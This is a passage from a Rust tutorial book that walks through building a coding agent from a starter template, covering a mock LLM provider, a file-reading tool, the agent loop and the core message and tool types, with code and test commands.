
Overview

Welcome to Building a Coding Agent in Rust -- a hands-on tutorial where you build your own AI coding agent from scratch in the mini-claw-code-starter template, guided by the architecture of Claude Code.

Looking for the original V1 hands-on tutorial? It's archived at archive/v1-book/en/ (Chinese translation at archive/v1-book/zh/).

What you'll build

By the end of this book, you'll have built a complete coding agent that:

  • Connects to an LLM via an OpenAI-compatible HTTP provider
  • Uses tools -- bash, file read/write/edit -- with a simple Tool trait
  • Loops autonomously -- the SimpleAgent drives the provider-tool cycle until done
  • Streams events through channels so a UI can show progress in real-time
  • Tests deterministically with a MockProvider that returns canned responses
  • Enforces safety with a permission engine, safety checks, and hooks
  • Loads project instructions from CLAUDE.md files and layered config

Architecture

The starter codebase uses a flat module layout:

mini-claw-code-starter/src/
  types.rs          -- Messages, tools, ToolSet, Provider trait, TokenUsage
  agent.rs          -- SimpleAgent (the core agent loop) and AgentEvent
  mock.rs           -- MockProvider for deterministic testing
  streaming.rs      -- SSE parsing, StreamAccumulator
  instructions.rs   -- InstructionLoader (CLAUDE.md discovery)
  permissions.rs    -- PermissionEngine
  safety.rs         -- SafetyChecker, SafeToolWrapper
  hooks.rs          -- Hook trait, HookRegistry
  planning.rs       -- PlanAgent (two-phase plan/execute)
  config.rs         -- Config, ConfigLoader, CostTracker
  context.rs        -- SystemPromptBuilder
  providers/
    openrouter.rs   -- OpenRouterProvider (real HTTP backend)
  tools/            -- Tool implementations (bash, file read/write/edit)

How to use this book

Start with Chapters 1-3. Three short, hands-on chapters get you from zero to a working agent in under an hour:

  1. Your First LLM Call — implement MockProvider (test_mock_)
  2. Your First Tool Call — implement ReadTool (test_read_)
  3. The Agentic Loop — implement single_turn and SimpleAgent (test_single_turn_, test_simple_agent_)

Then continue with Chapters 4-18 for the full architecture: streaming, permissions, hooks, plan mode, configuration, and more.

The mini-claw-code-starter crate contains stub implementations with unimplemented!() markers and doc comments describing what to do. Read the chapter, fill in the stubs, then verify your work by running the tests.

Run tests to check your progress:

# Run tests for a specific chapter (use the correct test name from the table below)
cargo test -p mini-claw-code-starter test_mock_

# Run all tests
cargo test -p mini-claw-code-starter

Prerequisites

  • Rust (edition 2024, 1.85+)
  • Basic familiarity with async Rust (async/await, tokio)
  • An OpenRouter API key (for the live provider chapters)

Chapter roadmap

Getting Started

Chapter | Topic | File(s) to edit | Test command
1 | Your First LLM Call | src/mock.rs | test_mock_
2 | Your First Tool Call | src/tools/read.rs | test_read_
3 | The Agentic Loop | src/agent.rs | test_single_turn_, test_simple_agent_

Part I: Core Agent

Chapter | Topic | File(s) to edit | Test command
4 | Messages & Types | src/types.rs (pre-filled) | test_mock_
5a | Provider & Streaming Foundations | src/mock.rs, src/streaming.rs | test_mock_, test_streaming_parse_, test_streaming_accumulator_
5b | OpenRouter & StreamingAgent | src/providers/openrouter.rs, src/streaming.rs | test_openrouter_, test_streaming_stream_chat_, test_streaming_streaming_agent_
6 | Tool Interface | src/tools/read.rs (already done in Ch2 — re-read) | test_read_
7 | The Agentic Loop (Deep Dive) | src/agent.rs (already done in Ch3 — re-read) | test_single_turn_, test_simple_agent_

Part II: Prompt & Tools

Chapter | Topic | File(s) to edit | Test command
8 | System Prompt | src/instructions.rs | instructions
9 | File Tools | src/tools/write.rs, src/tools/edit.rs (read.rs already done in Ch2) | test_read_, test_write_, test_edit_
10 | Bash Tool | src/tools/bash.rs | test_bash_
11 | Search Tools | (extension -- no stubs) | (no tests)
12 | Tool Registry | src/types.rs (ToolSet — pre-filled, re-read) | test_multi_tool_

Part III: Safety & Control

Chapter | Topic | File(s) to edit | Test command
13 | Permission Engine | src/permissions.rs | permissions
14 | Safety Checks | src/safety.rs | safety
15 | Hooks | src/hooks.rs | hooks
16 | Plan Mode | src/planning.rs | plan

Part IV: Configuration

Chapter | Topic | File(s) to edit | Test command
17 | Settings Hierarchy | src/config.rs, src/usage.rs | config, cost_tracker
18 | Project Instructions | src/instructions.rs, src/context.rs | instructions, context_manager

Bonus (no chapter yet -- stubs + tests available)

Topic | File to edit | Test command
AskTool (user input) | src/tools/ask.rs | ask (run with --ignored)
SubagentTool (child agents) | src/subagent.rs | subagent (run with --ignored)
Interactive CLI | examples/chat.rs | cargo run --example chat (after stub is filled in)

Let's start building.

Chapter 1: Your First LLM Call

File(s) to edit: src/mock.rs
Test to run: cargo test -p mini-claw-code-starter test_mock_
Estimated time: 15 min

Before building an agent, you need to talk to an LLM. In this chapter you will implement a MockProvider — a fake LLM that returns canned responses. No API key, no HTTP, no network. Just the protocol.

The nouns

Before any code, a one-line glossary of the types you'll meet in chapters 1–3. They're all already defined in src/types.rs — this list is just so the names aren't strangers. Chapter 4 is the deep dive; for now, a sentence each is enough:

Type | What it is
Message | Enum of conversation entries: System, User, Assistant, ToolResult.
AssistantTurn | What the LLM returns: optional text, a Vec<ToolCall>, a StopReason, optional TokenUsage.
StopReason | Stop (the LLM is done) or ToolUse (it wants to call tools).
ToolCall | LLM's request to call a tool: id, name, JSON arguments.
ToolDefinition | JSON-Schema description of a tool, sent to the LLM so it knows what's available.
Tool | Trait with definition() and call() — implement it to give the agent a new capability.
ToolSet | A HashMap<String, Box<dyn Tool>> for dispatching tool calls by name.
Provider | Trait with one chat() method — the abstraction over "an LLM that responds to messages."

If any of these feel fuzzy later, come back here. Chapter 4 rebuilds all of them from scratch with full commentary.

Goal

Implement MockProvider so that:

  1. You create it with a VecDeque<AssistantTurn> of canned responses.
  2. Each call to chat() returns the next response in sequence.
  3. If all responses have been consumed, it returns an error.

The protocol

Every LLM interaction follows the same pattern:

sequenceDiagram
    participant C as Your Code
    participant L as LLM

    C->>L: messages + tool definitions
    L-->>C: text and/or tool calls + stop reason

You send messages and a list of available tools. The LLM responds with text, tool calls, or both — plus a StopReason telling you what to do next.

In Rust, that is one trait with one method:

pub trait Provider: Send + Sync {
    fn chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send;
}

The core types

Open mini-claw-code-starter/src/types.rs. These types are already defined for you — read them to understand the protocol:

classDiagram
    class Provider {
        <<trait>>
        +chat(messages, tools) AssistantTurn
    }

    class AssistantTurn {
        text: Option~String~
        tool_calls: Vec~ToolCall~
        stop_reason: StopReason
        usage: Option~TokenUsage~
    }

    class StopReason {
        <<enum>>
        Stop
        ToolUse
    }

    class Message {
        <<enum>>
        System(String)
        User(String)
        Assistant(AssistantTurn)
        ToolResult
    }

    Provider --> AssistantTurn : returns
    Provider --> Message : receives
    AssistantTurn --> StopReason
    AssistantTurn --> ToolCall : contains 0..*

The LLM responds with an AssistantTurn:

pub struct AssistantTurn {
    pub text: Option<String>,          // what the LLM said
    pub tool_calls: Vec<ToolCall>,     // tools it wants to call
    pub stop_reason: StopReason,       // Stop or ToolUse
    pub usage: Option<TokenUsage>,     // token counts (optional)
}

Two outcomes:

  • StopReason::Stop — the LLM is done, read text for the answer
  • StopReason::ToolUse — the LLM wants to call tools, read tool_calls

That's it. Every coding agent — Claude Code, Cursor, Copilot — runs on this exact protocol.
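Dispatching on the two outcomes can be sketched in a few lines. This is a self-contained, std-only illustration; the structs here are simplified stand-ins for the real types in src/types.rs (tool calls are reduced to plain names):

```rust
#[derive(Debug)]
enum StopReason { Stop, ToolUse }

struct AssistantTurn {
    text: Option<String>,
    tool_calls: Vec<String>, // simplified: just tool names
    stop_reason: StopReason,
}

// The caller's only job: branch on stop_reason.
fn handle(turn: AssistantTurn) -> String {
    match turn.stop_reason {
        // Stop: the answer is in `text`
        StopReason::Stop => turn.text.unwrap_or_default(),
        // ToolUse: the work to do is in `tool_calls`
        StopReason::ToolUse => format!("run tools: {:?}", turn.tool_calls),
    }
}

fn main() {
    let done = AssistantTurn { text: Some("42".into()), tool_calls: vec![], stop_reason: StopReason::Stop };
    assert_eq!(handle(done), "42");
    let wants = AssistantTurn { text: None, tool_calls: vec!["read".into()], stop_reason: StopReason::ToolUse };
    assert_eq!(handle(wants), "run tools: [\"read\"]");
    println!("ok");
}
```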

Key Rust concept: Mutex for interior mutability

The Provider trait takes &self (not &mut self) because providers are shared across async tasks. But MockProvider needs to mutate its response queue. The solution is Mutex<VecDeque<AssistantTurn>> — it lets you mutate the queue through a shared reference.

pub struct MockProvider {
    responses: Mutex<VecDeque<AssistantTurn>>,
}

This pattern — Mutex around shared state in a &self method — appears throughout async Rust.
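Here is the pattern in miniature, as a self-contained sketch: a plain queue of integers stands in for the response queue, and `next()` mutates through `&self` exactly the way `chat()` will.

```rust
use std::collections::VecDeque;
use std::sync::Mutex;

// Interior mutability: `next` takes &self but still mutates the queue,
// because the Mutex hands out exclusive access at runtime.
struct Queue {
    items: Mutex<VecDeque<i32>>,
}

impl Queue {
    fn next(&self) -> Option<i32> {
        self.items.lock().unwrap().pop_front()
    }
}

fn main() {
    let q = Queue { items: Mutex::new(VecDeque::from([1, 2])) };
    assert_eq!(q.next(), Some(1));
    assert_eq!(q.next(), Some(2));
    assert_eq!(q.next(), None); // exhausted — the mock turns this case into an error
    println!("ok");
}
```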

The implementation

Open src/mock.rs. You'll see the struct definition and two stubs.

Step 1: new()

Wrap the VecDeque in a Mutex:

pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
    Self {
        responses: Mutex::new(responses),
    }
}

Step 2: chat()

Lock the mutex, pop the front response, convert None to an error:

async fn chat(
    &self,
    _messages: &[Message],
    _tools: &[&ToolDefinition],
) -> anyhow::Result<AssistantTurn> {
    self.responses
        .lock()
        .unwrap()
        .pop_front()
        .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses"))
}

Three lines of logic. The mock ignores messages and tools entirely — it just returns the next canned response.

Run the tests

cargo test -p mini-claw-code-starter test_mock_

14 tests verify your mock, including:

  • test_mock_returns_text — basic text response
  • test_mock_returns_tool_calls — response with tool calls
  • test_mock_steps_through_sequence — FIFO order across multiple calls
  • test_mock_empty_responses_exhausted — error when queue is empty
  • test_mock_ignores_messages_and_tools — mock doesn't look at inputs
  • test_mock_long_sequence — 10 responses consumed in order

What just happened

You implemented the Provider trait — the interface every LLM backend must satisfy. The MockProvider is your testing workhorse. Every test in this entire course uses it instead of calling a real API.

Later (Chapter 5b) you'll see OpenRouterProvider, which makes real HTTP calls. But the trait is the same. Swap the provider, and the rest of the code doesn't change.

Key takeaway

An LLM is a function: messages in → (text, tool_calls, stop_reason) out. Everything else is plumbing.


Chapter 2: Your First Tool Call

File(s) to edit: src/tools/read.rs
Test to run: cargo test -p mini-claw-code-starter test_read_
Estimated time: 15 min

An LLM can't read files, run commands, or browse the web. It can only generate text. But it can ask your code to do those things. That's what tools are.

Goal

Implement ReadTool so that:

  1. It declares its name, description, and parameter schema.
  2. When called with {"path": "some/file.txt"}, it reads the file and returns its contents.
  3. Missing arguments or non-existent files produce errors.

How tool calling works

The LLM never touches the filesystem. It describes what it wants, and your code does it:

sequenceDiagram
    participant A as Agent
    participant L as LLM
    participant T as ReadTool

    A->>L: "What's in doc.txt?" + tool schemas
    L-->>A: tool_call: read(path="doc.txt")
    A->>T: call({"path": "doc.txt"})
    T-->>A: "file contents here..."
    A->>L: tool result: "file contents here..."
    L-->>A: "The file contains..."

The LLM sees a JSON schema describing each tool. When it decides to use one, it outputs a structured request with the tool name and arguments. Your code parses this, runs the real function, and sends the result back.

The Tool trait

Open mini-claw-code-starter/src/types.rs and find the Tool trait:

#[async_trait::async_trait]
pub trait Tool: Send + Sync {
    fn definition(&self) -> &ToolDefinition;
    async fn call(&self, args: Value) -> anyhow::Result<String>;
}

Two methods:

  • definition() returns the JSON schema that tells the LLM what this tool does and what arguments it takes
  • call() executes the tool and returns a string result

Why #[async_trait] on Tool — and not on Provider?

You'll see this split throughout the book, so it's worth owning the one-liner now:

  • Tool uses #[async_trait] because we store tools heterogeneously in Box<dyn Tool> (a ReadTool and a BashTool coexist in one HashMap). Box<dyn …> requires object safety, and a plain async fn in a trait is not object-safe — it returns an anonymous future type the compiler can't erase. The #[async_trait] macro rewrites async fn call(&self, …) into fn call(&self, …) -> Pin<Box<dyn Future + Send + '_>>, which is object-safe. One heap allocation per call, which is nothing next to the I/O the tool is about to do.
  • Provider uses RPITIT (return-position impl Trait in traits, stable since Rust 1.75) because we only ever hold it as a generic parameter — SimpleAgent<P: Provider> — never as dyn Provider. Without object safety to preserve, we get the zero-cost version: no boxing, no allocation, the compiler monomorphizes a unique future type per impl.

The two-line mnemonic:

stored as Box<dyn T>           → #[async_trait]  (boxed future, object-safe)
used as a generic P: Trait     → RPITIT          (zero-cost, not object-safe)

That's the whole trade-off. Chapter 6 reprises it with the full Provider signature side-by-side once you've seen both traits in use.

The implementation

Open src/tools/read.rs. You'll see the struct and two stubs.

Step 1: The definition

A ToolDefinition describes the tool to the LLM using JSON Schema:

pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("read", "Read the contents of a file.")
            .param("path", "string", "Absolute path to the file", true),
    }
}

The .param() builder adds a parameter with its type, description, and whether it's required. When the LLM sees this schema, it knows it can call a tool named "read" with a required string argument "path".
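For reference, the schema the LLM receives for this definition looks roughly like this (the exact envelope varies by provider wire format; the shape below follows the builder shown above):

```json
{
  "name": "read",
  "description": "Read the contents of a file.",
  "parameters": {
    "type": "object",
    "properties": {
      "path": { "type": "string", "description": "Absolute path to the file" }
    },
    "required": ["path"]
  }
}
```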

Step 2: The call

Extract the path from the JSON arguments, read the file, return the contents:

async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;

    tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))
}

Three lines of logic. args is a serde_json::Value — the parsed JSON arguments from the LLM. The context() and with_context() methods (from anyhow) add human-readable error messages.

Here is the data flow:

flowchart LR
    A["args: path = foo.txt"] --> B["as_str()"]
    B --> C["tokio::fs::read_to_string"]
    C --> D["Ok: file contents"]
    C --> E["Err: failed to read"]

Run the tests

cargo test -p mini-claw-code-starter test_read_

15 tests verify your tool, including:

  • test_read_read_definition — schema has the right name and required params
  • test_read_read_file — reads a real file from a temp directory
  • test_read_read_missing_file — returns an error for nonexistent files
  • test_read_read_missing_arg — returns an error when path is missing
  • test_read_read_utf8_content — handles multi-line content correctly
  • test_read_read_empty_file — reads an empty file without error

The pattern

Every tool in this project follows the same three-step pattern:

  1. DefineToolDefinition::new("name", "description").param(...)
  2. Extract — pull arguments from the JSON Value
  3. Execute — do the thing, return a String

You'll repeat this for WriteTool, EditTool, and BashTool in later chapters. Once you've written one tool, you've written them all.

Key takeaway

A tool is the bridge between "the LLM wants to read a file" and "the file is actually read." The LLM describes its intent as structured JSON. Your code does the work.


Chapter 3: The Agentic Loop

File(s) to edit: src/agent.rs
Tests to run: cargo test -p mini-claw-code-starter test_single_turn_ (single_turn), cargo test -p mini-claw-code-starter test_simple_agent_ (SimpleAgent)
Estimated time: 20 min

You have a provider (talks to the LLM) and a tool (reads files). Now you connect them. This is where the agent comes alive.

Goal

Implement two things:

  1. single_turn() — handle one prompt with at most one round of tool calls
  2. SimpleAgent — wrap single_turn in a loop that keeps going until the LLM is done

What's in scope for Ch3 (and what isn't)

When you open src/agent.rs you'll see five unimplemented!() stubs. Only four of them are Chapter 3's job:

Stub | Chapter | Notes
single_turn | Ch3 | one prompt, at most one tool round
SimpleAgent::execute_tools | Ch3 | look up each tool, collect (id, content) pairs
SimpleAgent::push_results | Ch3 | push Assistant turn, then one ToolResult each
SimpleAgent::chat | Ch3 | the main agent loop
SimpleAgent::run_with_history | Ch7 | events-based loop; leave stubbed for now
The run_with_history / run_with_events pair is for Chapter 7 (AgentEvent-driven execution). No Ch3 test calls them, so the unimplemented!() there will not panic during test_simple_agent_. Ignore them until Chapter 7 introduces the events model.

The core idea

Every coding agent — Claude Code, Cursor, Aider — is this loop:

loop {
    response = provider.chat(messages, tools)
    if response.stop_reason == Stop:
        return response.text
    for call in response.tool_calls:
        result = tools.execute(call)
        messages.append(result)
}

The LLM decides when to stop. Your code just follows instructions.

flowchart TD
    A["User prompt"] --> B["provider.chat()"]
    B --> C{"stop_reason?"}
    C -- "Stop" --> D["Return text"]
    C -- "ToolUse" --> E["Execute tool calls"]
    E --> F["Append results to messages"]
    F --> B

Part 1: single_turn()

Start simple. single_turn() handles one prompt with at most one round of tool calls — no looping yet.

Key Rust concept: ToolSet

The function takes a &ToolSet — a HashMap<String, Box<dyn Tool>> that indexes tools by name for O(1) lookup:

pub async fn single_turn<P: Provider>(
    provider: &P,
    tools: &ToolSet,
    prompt: &str,
) -> anyhow::Result<String>

The flow

flowchart TD
    A["prompt"] --> B["provider.chat()"]
    B --> C{"stop_reason?"}
    C -- "Stop" --> D["Return text"]
    C -- "ToolUse" --> E["Execute each tool call"]
    E --> F{"Tool found?"}
    F -- "Yes" --> G["tool.call() → result"]
    F -- "No" --> H["error: unknown tool"]
    G --> I["Push Assistant + ToolResult messages"]
    H --> I
    I --> J["provider.chat() again"]
    J --> K["Return final text"]

Implementation

pub async fn single_turn<P: Provider>(
    provider: &P,
    tools: &ToolSet,
    prompt: &str,
) -> anyhow::Result<String> {
    let defs = tools.definitions();
    let mut messages = vec![Message::User(prompt.to_string())];

    let turn = provider.chat(&messages, &defs).await?;

    match turn.stop_reason {
        StopReason::Stop => Ok(turn.text.unwrap_or_default()),
        StopReason::ToolUse => {
            // Execute each tool call, collect results
            let mut results = Vec::new();
            for call in &turn.tool_calls {
                let content = match tools.get(&call.name) {
                    Some(t) => t.call(call.arguments.clone())
                        .await
                        .unwrap_or_else(|e| format!("error: {e}")),
                    None => format!("error: unknown tool `{}`", call.name),
                };
                results.push((call.id.clone(), content));
            }

            // Feed results back to the LLM
            messages.push(Message::Assistant(turn));
            for (id, content) in results {
                messages.push(Message::ToolResult { id, content });
            }

            let final_turn = provider.chat(&messages, &defs).await?;
            Ok(final_turn.text.unwrap_or_default())
        }
    }
}

Three key details:

  1. Collect results before pushing Message::Assistant(turn) — the push moves turn, so you can't borrow turn.tool_calls after that
  2. Never crash on tool failure — catch errors with unwrap_or_else and return them as strings. The LLM reads the error and adapts
  3. Unknown tools get an error string — not a panic. The LLM might hallucinate a tool name; your agent handles it gracefully
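Detail 1 is worth seeing in isolation. Below is a self-contained sketch of collect-before-move with a hypothetical Turn struct (not the real AssistantTurn): once a value is pushed into a container it is moved, so anything you still need from it must be cloned or collected first.

```rust
struct Turn {
    text: Option<String>,
    calls: Vec<String>, // simplified stand-in for tool_calls
}

// Collect the call names *before* pushing `turn` into the log;
// after the push, `turn` is moved and `turn.calls` cannot be borrowed.
fn record(turn: Turn, log: &mut Vec<Turn>) -> Vec<String> {
    let names = turn.calls.clone(); // clone before the move
    log.push(turn);                 // `turn` moved here
    names
}

fn main() {
    let mut log = Vec::new();
    let turn = Turn { text: None, calls: vec!["read".into()] };
    let names = record(turn, &mut log);
    assert_eq!(names, vec!["read".to_string()]);
    assert_eq!(log.len(), 1);
    println!("ok");
}
```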

Test it

cargo test -p mini-claw-code-starter test_single_turn_

14 tests including:

  • test_single_turn_direct_response — LLM responds immediately, no tools
  • test_single_turn_one_tool_call — LLM reads a file, then answers
  • test_single_turn_unknown_tool — LLM calls a nonexistent tool, gets an error, recovers
  • test_single_turn_provider_error — provider returns an error, propagated correctly

Part 2: SimpleAgent

single_turn handles one round. A real agent loops until the LLM is done. That's SimpleAgent.

The struct

pub struct SimpleAgent<P: Provider> {
    provider: P,
    tools: ToolSet,
}

Constructor and builder

pub fn new(provider: P) -> Self {
    Self { provider, tools: ToolSet::new() }
}

pub fn tool(mut self, t: impl Tool + 'static) -> Self {
    self.tools.push(t);
    self
}

The builder pattern lets you chain tool registration:

let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(BashTool::new());

The loop: chat()

Aside: who decides Stop vs ToolUse?

The model does. StopReason is not a value we compute from the response; it is a field the LLM API returns describing what the model did. When the model emitted plain text and stopped, the API reports stop (or end_turn). When the model emitted one or more tool-call blocks and paused expecting the caller to run them, the API reports tool_use (OpenAI calls it tool_calls). Our StopReason enum is just a thin translation of that API field into a Rust type; the decision is baked into the model's generation.

Practically, the model decides as it generates: once it begins writing a tool-call block, most providers force the response to terminate on that block and return tool_use to the caller. It does not produce text and then choose whether to call a tool as a separate step. This is why the loop below looks so simple -- we never have to second-guess the stop reason, we just dispatch on it.


This is single_turn generalized into a loop. Instead of calling the provider twice and returning, it keeps going until StopReason::Stop:

pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> {
    let defs = self.tools.definitions();

    loop {
        let turn = self.provider.chat(messages, &defs).await?;

        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let results = self.execute_tools(&turn.tool_calls).await;
                Self::push_results(messages, turn, results);
            }
        }
    }
}

Note: clone turn.text before pushing Message::Assistant(turn) — the push moves turn.

run() is a convenience wrapper:

pub async fn run(&self, prompt: &str) -> anyhow::Result<String> {
    let mut messages = vec![Message::User(prompt.to_string())];
    self.chat(&mut messages).await
}

The helper methods execute_tools() and push_results() factor out the tool execution and message building — see the stubs in agent.rs for the signatures.

Test it

cargo test -p mini-claw-code-starter test_simple_agent_

16 tests including:

  • test_simple_agent_simple_text — single-turn text response
  • test_simple_agent_multi_step — LLM reads a file, then writes a response
  • test_simple_agent_three_turn_loop — read → edit → verify, three rounds
  • test_simple_agent_error_recovery — tool fails, LLM reads the error and adapts

What just happened

You built a coding agent.

let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(BashTool::new());

let answer = agent.run("What files are in this directory?").await?;

The agent sends the prompt to the LLM, the LLM calls bash("ls"), the agent executes it, feeds the output back, and the LLM summarizes the result. The loop handles any number of tool calls across any number of rounds.

That is the architecture. Everything else — streaming, permissions, plan mode, subagents — is built on top of this loop.


Chapter 4: Messages & Types

File(s) to edit: none -- src/types.rs is pre-filled in the starter. This chapter is a study-only deep dive into the type system you have already been using.
Test to run: cargo test -p mini-claw-code-starter test_mock_ -- it passed after Chapter 1 and still passes now, because the implementation work lives in src/mock.rs. The tests exercise the shapes defined in types.rs, which is why they connect here.
Estimated time: 20 min (study only)

Goal

  • Understand how the Message enum's four variants (System, User, Assistant, ToolResult) give every conversation participant a typed representation.
  • Understand the ToolDefinition builder pattern and why tools describe their JSON Schema parameters at construction time rather than hand-writing JSON.
  • Understand ToolSet as the runtime registry that lets the agent dispatch tool calls by name.
  • Understand the Provider trait's RPITIT signature and why it leaves room for any LLM backend to drop in without changing agent code.

Every coding agent is, at its core, a loop over a conversation. The user speaks, the model replies, tools produce results, and those results go back to the model. Before we can build that loop, we need a type system that represents every participant and every kind of payload in the conversation.

This chapter walks through the foundational types that the rest of the codebase depends on. Nothing here needs to be written by you -- src/types.rs is complete in the starter. Read for comprehension; the hands-on work resumes in Chapter 5a.

How the types connect

flowchart TD
    U[Message::User] --> P[Provider::chat]
    S[Message::System] --> P
    P --> AT[AssistantTurn]
    AT --> SR{StopReason}
    SR -->|Stop| Text[Final text response]
    SR -->|ToolUse| TC[ToolCall]
    TC --> TS[ToolSet::get]
    TS --> T[Tool::call]
    T --> TR[Message::ToolResult]
    TR --> P

Why a rich message type?

If you look at a raw LLM API (OpenAI, Anthropic), messages are JSON blobs with a role field: "system", "user", or "assistant". That is fine for a one-shot chatbot, but a coding agent needs more:

  • Tool results that carry the ID of the tool call they answer, so the model can correlate request and response.
  • System instructions that configure the model's behavior.

Claude Code models all of these as variants of a single Message enum. Our starter uses a simplified version with four variants.

File layout

All types live in a single file: src/types.rs. This includes the Message enum, AssistantTurn, ToolDefinition, ToolCall, Tool trait, ToolSet, Provider trait, TokenUsage, and StopReason.


1.1 The Message enum

Here is the full enum with its four variants:

pub enum Message {
    System(String),
    User(String),
    Assistant(AssistantTurn),
    ToolResult { id: String, content: String },
}

The starter uses plain enum variants instead of wrapper structs. There are no message IDs, no serde tags, no constructors -- you construct variants directly:

let msg = Message::User("Hello".to_string());
let sys = Message::System("You are a helpful assistant".to_string());
let result = Message::ToolResult {
    id: call_id.clone(),
    content: "file contents here".to_string(),
};

Let's walk through each variant.

System

Message::System(String)

System messages carry instructions injected by the agent, not typed by the user. They configure the model's behavior (e.g., "You are a coding assistant").

User

Message::User(String)

Straightforward -- the human's input. One message per turn.

Assistant

Message::Assistant(AssistantTurn)

This is the richest variant. The model's response is wrapped in an AssistantTurn struct (described below). The model can return text, tool calls, or both.

ToolResult

Message::ToolResult { id: String, content: String }

After the agent executes a tool, it packages the output into a ToolResult variant and appends it to the conversation. The id field links this result back to the specific ToolCall it answers -- without this, the model cannot correlate which result belongs to which call when multiple tools run in a single turn.

Note that in the starter, tool results are simple strings. There is no is_truncated flag or separate struct.


1.2 AssistantTurn

The assistant's response is captured in an AssistantTurn struct:

pub struct AssistantTurn {
    pub text: Option<String>,
    pub tool_calls: Vec<ToolCall>,
    pub stop_reason: StopReason,
    pub usage: Option<TokenUsage>,
}

The model can return text, tool calls, or both. text is Option<String> because when the model decides to use a tool, it may produce no human-readable text at all -- it just emits one or more ToolCall entries. The stop_reason tells the agent loop whether to execute tools and continue, or to present the response to the user and stop.

The usage field is Option<TokenUsage> because we attach token counts at parse time from the API response. Mock providers in tests may leave it as None.


1.3 StopReason

pub enum StopReason {
    /// The model finished — check `text` for the response.
    Stop,
    /// The model wants to use tools — check `tool_calls`.
    ToolUse,
}

This tiny enum drives the entire agent loop. When the provider parses the LLM response:

  • Stop means the model is done -- its text field contains the final answer for the user.
  • ToolUse means the model wants to invoke tools -- the agent should look at tool_calls, execute them, append the results, and call the provider again.

The agent loop uses match on stop_reason to decide whether to break or continue.


1.4 ToolCall

pub struct ToolCall {
    pub id: String,
    pub name: String,
    pub arguments: Value,
}

When the LLM responds with StopReason::ToolUse, it includes one or more ToolCall entries. Each has:

  • id -- a unique identifier assigned by the API (e.g., "call_abc123"). This is what the id field of Message::ToolResult references.
  • name -- which tool to invoke (e.g., "bash", "read", "edit").
  • arguments -- a JSON object whose shape matches the tool's parameter schema.

The agent loop uses name to look up the tool in the ToolSet, passes arguments to tool.call(), and wraps the output in a Message::ToolResult whose id matches the ToolCall's id.
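The dispatch step in miniature -- a sync, std-only sketch (the real ToolSet stores Box<dyn Tool> and call() is async; plain fn pointers stand in here):

```rust
use std::collections::HashMap;

// Look up a tool by name and run it; unknown names become error strings,
// mirroring how the agent wraps failures into results instead of panicking.
fn dispatch(tools: &HashMap<&str, fn(&str) -> String>, name: &str, args: &str) -> String {
    match tools.get(name) {
        Some(f) => f(args),
        None => format!("error: unknown tool `{name}`"),
    }
}

fn main() {
    let mut tools: HashMap<&str, fn(&str) -> String> = HashMap::new();
    tools.insert("echo", |args| format!("echoed: {args}"));

    // The result would be wrapped as Message::ToolResult { id, content } in the real loop.
    assert_eq!(dispatch(&tools, "echo", "hi"), "echoed: hi");
    assert_eq!(dispatch(&tools, "nope", ""), "error: unknown tool `nope`");
    println!("ok");
}
```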


1.5 ToolDefinition and the builder pattern

Rust concept: the builder pattern

The ToolDefinition uses the builder pattern -- a common Rust idiom where methods take self by value and return Self, enabling method chaining like .param(...).param(...). Each call consumes the struct and returns a modified version. This works because Rust's move semantics mean there is no overhead -- no cloning, no reference counting. The compiler optimizes the chain into a series of in-place mutations. You will see this pattern throughout the codebase: ToolSet::new().with(tool1).with(tool2), SimpleAgent::new(provider).tool(bash).
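As a standalone illustration of the idiom, here is a by-value builder with types invented for the example (they are not from the starter):

```rust
// A minimal by-value builder: each method consumes `self` and returns it,
// so calls chain without clones or reference counting. Example types only.
#[derive(Debug)]
struct Request {
    url: String,
    retries: u32,
    timeout_secs: u64,
}

impl Request {
    fn new(url: &str) -> Self {
        Self { url: url.to_string(), retries: 0, timeout_secs: 30 }
    }
    fn retries(mut self, n: u32) -> Self {
        self.retries = n;
        self // moved back to the caller -- no allocation involved
    }
    fn timeout_secs(mut self, s: u64) -> Self {
        self.timeout_secs = s;
        self
    }
}

fn main() {
    let req = Request::new("https://example.com").retries(3).timeout_secs(10);
    assert_eq!(req.retries, 3);
    assert_eq!(req.timeout_secs, 10);
}
```

Each `mut self` method mutates its own local copy (really the same moved value) and hands ownership back, which is why the chain needs no `&mut` borrows.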

Every tool must describe itself to the LLM with a JSON Schema so the model knows what parameters are available. ToolDefinition holds this schema and provides a builder API for constructing it without hand-writing JSON:

pub struct ToolDefinition {
    pub name: &'static str,
    pub description: &'static str,
    pub parameters: Value,
}

The constructor initializes an empty object schema:

impl ToolDefinition {
    pub fn new(name: &'static str, description: &'static str) -> Self {
        Self {
            name,
            description,
            parameters: serde_json::json!({
                "type": "object",
                "properties": {},
                "required": []
            }),
        }
    }
}

.param() -- add a simple parameter

pub fn param(
    mut self,
    name: &str,
    type_: &str,
    description: &str,
    required: bool,
) -> Self {
    self.parameters["properties"][name] = serde_json::json!({
        "type": type_,
        "description": description
    });
    if required {
        self.parameters["required"]
            .as_array_mut()
            .unwrap()
            .push(Value::String(name.to_string()));
    }
    self
}

This is the workhorse. Most tool parameters are simple types -- a "string" for a file path, a "number" for a line offset. The builder takes self by value and returns it, enabling chained calls:

ToolDefinition::new("read", "Read a file from disk")
    .param("path", "string", "Absolute path to the file", true)
    .param("offset", "number", "Line number to start reading from", false)
    .param("limit", "number", "Maximum number of lines to read", false)

.param_raw() -- add a complex parameter

pub fn param_raw(
    mut self,
    name: &str,
    schema: Value,
    required: bool,
) -> Self {
    self.parameters["properties"][name] = schema;
    if required {
        self.parameters["required"]
            .as_array_mut()
            .unwrap()
            .push(Value::String(name.to_string()));
    }
    self
}

Some parameters need richer schemas -- enums, arrays, nested objects. param_raw lets you pass an arbitrary serde_json::Value as the schema. For example, an edit tool might define:

